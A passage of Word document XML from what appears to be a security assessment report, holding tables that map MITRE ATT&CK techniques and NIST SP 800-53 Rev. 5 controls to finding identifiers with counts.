            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1213</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1580</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-03, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1589</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1590</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.4 NIST SP 800-53 Revision 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Findings are mapped to the NIST SP 800-53 Rev. 5 controls that address them.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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4036"/>
        <w:gridCol w:w="4036"/>
        <w:gridCol w:w="568"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>AC-3 Access Enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-08, CF-02, CF-09, CF-10, DET-04, PB1-01, PB1-03, PB1-18, PB2-09, PB2-10, PB2-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>AC-6 Least Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-08, CF-11, CI-13, DEP-02, DEP-05, PB1-01, PB1-03, PB1-05, PB2-01, PB2-02, PB2-04, PB2-06, PB2-12, SEC-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>AU-6 Audit Record Review, Analysis, and Reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-03, DET-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>AU-9 Protection of Audit Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-12, CI-03, PB1-16, PB2-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>AU-12 Audit Record Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-03, DET-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CM-2 Baseline Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-02, DET-15, DET-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CM-3 Configuration Change Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-14, CI-01, SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CM-5 Access Restrictions for Change</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-08, PB1-02, PB1-03, PB2-09, PB2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CM-6 Configuration Settings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-04, APP-05, APP-09, APP-12, DET-07, PB2-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CM-7 Least Functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-08, CI-13, DEP-05, DEP-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CM-8 System Component Inventory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-01, DEP-02, DEP-03, DEP-04, DEP-06, DEP-07, DEP-08, DEP-09, DEP-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IA-5 Authenticator Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-03, PB1-06, PB2-07, PB2-08, SEC-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IA-5(7) Authenticator Management | No Embedded Unencrypted Static Authenticators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-02, PB1-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IR-4 Incident Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03, PB1-07, PB1-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>RA-5 Vulnerability Monitoring and Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-06, DEP-01, DEP-12, SEC-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SA-11 Developer Testing and Evaluation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-03, APP-05, APP-10, APP-13, APP-14, DET-14, SEC-03, SEC-05, SEC-08, SEC-09, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SA-15 Development Process, Standards, and Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-14, CI-01, CI-02, SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SA-22 Unsupported System Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-01, DEP-02, DEP-03, DEP-04, DEP-05, DEP-06, DEP-08, DEP-09, DEP-10, PB2-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
